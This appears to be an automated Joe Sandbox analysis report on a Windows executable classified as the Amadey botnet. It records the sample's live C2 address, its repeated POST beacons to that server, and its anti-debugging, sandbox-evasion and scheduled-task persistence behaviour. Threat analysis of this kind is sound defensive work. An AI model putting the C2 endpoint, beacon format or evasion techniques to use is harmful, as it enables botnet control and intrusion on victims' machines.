Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561633
MD5:6d76634e0d5a3748dbb40ed91d91480a
SHA1:70fa798c82153db02e218b3a7efa2f56f051cced
SHA256:d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730
Tags:exeuser-Bitsight
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1548 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6D76634E0D5A3748DBB40ED91D91480A)
    • skotes.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 6D76634E0D5A3748DBB40ED91D91480A)
  • skotes.exe (PID: 4864 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6D76634E0D5A3748DBB40ED91D91480A)
  • skotes.exe (PID: 5588 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6D76634E0D5A3748DBB40ED91D91480A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000002.00000002.2227793699.0000000000D61000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000003.00000003.2194651545.0000000005580000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000002.00000003.2186521563.0000000004850000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.b40000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              3.2.skotes.exe.d60000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                6.2.skotes.exe.d60000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  2.2.skotes.exe.d60000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-24T02:23:07.289907+010028561471A Network Trojan was detected192.168.2.649852185.215.113.4380TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: file.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://185.215.113.43/Zu7JuNko/index.php15.113.43aAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Found malware configuration
                    Source: 00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeVirustotal: Detection: 54%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: file.exeReversingLabs: Detection: 55%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49852 -> 185.215.113.43:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D6BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00D6BE30
                    Source: unknownHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php15.113.43a
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php:
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpH
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
                    Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00DA78BB6_2_00DA78BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00DA70496_2_00DA7049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00DA88606_2_00DA8860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D64DE06_2_00D64DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00DA31A86_2_00DA31A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00DA2D106_2_00DA2D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D6E5306_2_00D6E530
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00DA779B6_2_00DA779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D64B306_2_00D64B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D97F366_2_00D97F36
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9983289339237057
                    Source: file.exeStatic PE information: Section: iaxkupqh ZLIB complexity 0.9948247839247639
                    Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983289339237057
                    Source: skotes.exe.0.drStatic PE information: Section: iaxkupqh ZLIB complexity 0.9948247839247639
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 55%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
